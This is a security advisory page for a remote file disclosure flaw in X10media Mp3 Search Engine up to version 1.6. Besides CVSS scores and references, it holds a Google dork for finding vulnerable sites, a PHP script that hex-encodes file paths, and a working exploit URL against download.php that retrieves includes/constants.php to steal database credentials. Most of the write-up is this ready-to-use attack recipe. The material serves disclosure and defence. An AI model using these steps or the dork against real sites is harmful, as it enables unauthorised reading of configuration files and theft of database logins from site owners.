X10media Mp3 Search Engine <= 1.6 Remote File Disclosure Vulnerability

2009.08.14
Credit: THUNDER
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-255


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

################# ~THUNDER ################################################################ ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability ~Founded by : THUNDER <t4h[at]hotmail.fr> ~Dork: "This search engine is in no way intended for illegal downloads. " ~File : Download.php =========================================================================================== to read files you need to encode the url, so you can use this php code : <? //Encode URL ** THUNDER ** function enc($string){ $hex=''; for ($i=0; $i < strlen($string); $i++){ $hex .= dechex(ord($string[$i])); } return $hex; } $thunder = $_GET[t]; echo enc($thunder); ?> How to use : http://127.0.0.1/encode.php?t=[Url] Ex : http://127.0.0.1/encode.php?t=includes/constants.php ##### ~Exploit ############################################################################ http://www.target.com/[path]/download.php?url=[Encoded url] Example : let's download the constants.php file wich contains the database login and password . the file will be downloaded as .mp3 exstension . http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870 Open the downloaded file with any text editor... ,and you got the database . ###########################################################################################

References:

http://xforce.iss.net/xforce/xfdb/46489
http://www.vupen.com/english/advisories/2008/3062
http://www.securityfocus.com/bid/32227
http://www.milw0rm.com/exploits/7074
http://secunia.com/advisories/32537
http://osvdb.org/49797


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top